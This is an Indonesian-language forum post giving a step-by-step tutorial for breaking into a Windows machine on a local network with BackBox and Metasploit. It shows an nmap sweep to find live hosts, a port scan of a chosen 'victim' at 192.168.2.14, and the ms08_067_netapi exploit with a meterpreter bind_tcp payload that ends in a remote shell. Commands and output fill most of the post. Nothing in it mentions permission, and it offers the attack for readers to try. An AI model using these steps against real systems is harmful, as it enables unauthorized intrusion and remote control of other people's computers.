My Forum

hacking dengan metasploit with backbox

Bagikan ke Teman! :


selamat sore kawan'' kali ini saya mau share tentang hacking dengan metasploit with backbox
buat yang tidak memakai backbox os tutorial ini sama saja koq :)
oke dech tanpa banyak bacot aja =))
let's go hacking 8) open your terminal ( buka terminal kamu ) <== sok banget pake bahasa inggris wkwk sekarang kita ketik kan " ifconfig -a "  <== jangan pakai tanda "
ntar hasil nya seperti ini :

flazer@flazer:~$ ifconfig -a
eth0      Link encap:Ethernet  HWaddr 00:c0:26:7f:82:8f
          inet addr:192.168.2.5  Bcast:192.168.2.255  Mask:255.255.255.0
          inet6 addr: fe80::2c0:26ff:fe7f:828f/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:36659 errors:0 dropped:0 overruns:0 frame:0
          TX packets:36943 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:26464535 (26.4 MB)  TX bytes:8073634 (8.0 MB)
          Interrupt:18 Base address:0xe800

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:2756 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2756 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:257415 (257.4 KB)  TX bytes:257415 (257.4 KB)

flazer@flazer:~$

sedangkan pada bagian ini " inet addr:192.168.2.5 " <== adalah ip kita :D
sekarang kita scan target nya yang sedang online
cara nya : nmap -sP 192.168.2.1/24  ( keterangan gak semua sama ip adress seperti itu ada juga yang seperti 192.168.1.1 pokok nya lain'' dech :D )
ntar hasil nya akan seperti ini :


flazer@flazer:~$ nmap -sP 192.168.2.1/24

Starting Nmap 6.00 ( http://nmap.org ) at 2013-02-04 16:49 WIT
Nmap scan report for 192.168.2.1
Host is up (0.00063s latency).
Nmap scan report for 192.168.2.4
Host is up (0.00047s latency).
Nmap scan report for 192.168.2.5
Host is up (0.00024s latency).
Nmap scan report for 192.168.2.6
Host is up (0.00039s latency).
Nmap scan report for 192.168.2.11
Host is up (0.00028s latency).
Nmap scan report for 192.168.2.14
Host is up (0.00038s latency).
Nmap scan report for 192.168.2.18
Host is up (0.00019s latency).
Nmap scan report for 192.168.2.21
Host is up (0.00035s latency).
Nmap scan report for 192.168.2.100
Host is up (0.00047s latency).
Nmap done: 256 IP addresses (9 hosts up) scanned in 6.45 seconds
flazer@flazer:~$

saya memilih yang " 192.168.2.14 " 
sekarang kita lakukangan dengan ngeping ip . siapa tau di ip tersebut di pasang firewall terkadang sih
cara nya : ping 192.168.2.14
apabila hasil nya reply kita lanjut lagi ke cara selanjut nya 
scan port terbuka dulu :D cara nya begini 
" nmap 192.168.2.14 "  <== ntar hasil nya akan seperti ini :

flazer@flazer:~$ nmap 192.168.2.14

Starting Nmap 6.00 ( http://nmap.org ) at 2013-02-04 16:52 WIT
Nmap scan report for 192.168.2.14
Host is up (0.00035s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
2869/tcp open  icslap

Nmap done: 1 IP address (1 host up) scanned in 1.22 seconds

oke sekarang kita lihat tuh ada port 445 yang open selanjut nya kita ke exploits nya cara nya ketik
" msfconsole " bila sudah ntar kita perintahkan begini lagi " show exploits "
ntar kita pilih yang " windows/smb/ms08_067_netapi  " 
cara nya begini " use windows/smb/ms08_067_netapi  " <== tekan enter ya jangan tekan alt+f2 =)) 
apabila sudah sekarang kita perintahkan begini " show payloads " 
ntar kita pilih " windows/meterpreter/bind_tcp " 
lanjut gan " set payloads windows/meterpreter/bind_tcp " 
sekarang kita Tambahkan target IP korban
" set RHOST 192.168.2.14 " 
ntar hasil nya seperti ini 
rhost => 192.168.2.14
msf  exploit(ms08_067_netapi) >
langsung kita lakukan exploit nya ketik " exploit " 
jika muncul prompt dibawah ini brarti serangan berhasil
meterpreter>

oke sampai di sini dulu ya cape ngetik nya selamat mencoba :) 



1 komentar — Skip ke Kotak Komentar

Taufik mengatakan...

nih dalam satu jaringan apa ga??

Posting Komentar — or Kembali ke Postingan